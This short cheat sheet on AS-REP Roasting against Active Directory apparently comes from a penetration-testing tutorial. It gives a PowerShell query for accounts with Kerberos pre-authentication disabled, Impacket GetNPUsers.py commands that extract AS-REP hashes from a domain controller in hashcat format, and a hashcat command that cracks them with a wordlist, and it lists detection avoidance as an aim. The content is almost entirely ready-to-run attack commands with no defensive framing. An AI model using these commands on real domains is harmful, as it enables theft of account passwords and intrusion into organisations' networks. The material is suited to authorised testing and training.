AS-REP Roasting in Depth
Enumerate pre-auth disabled users, extract AS-REP hashes, and crack efficiently.
Objectives
- Identify accounts with pre-authentication disabled
- Extract AS-REP hashes using multiple tools
- Optimize cracking and detection avoidance
Discovery
# PowerShell
Get-ADUser -Filter * -Properties userAccountControl | Where-Object { $_.userAccountControl -band 4194304 } | Select-Object SamAccountName
# Impacket
GetNPUsers.py domain.local/ -dc-ip 192.168.10.10 -no-pass -usersfile users.txt
Extraction & Cracking
# Impacket extraction GetNPUsers.py domain.local/ -dc-ip 192.168.10.10 -no-pass -format hashcat -outputfile asrep.hashes # Hashcat cracking hashcat -m 18200 asrep.hashes rockyou.txt -O --session asrep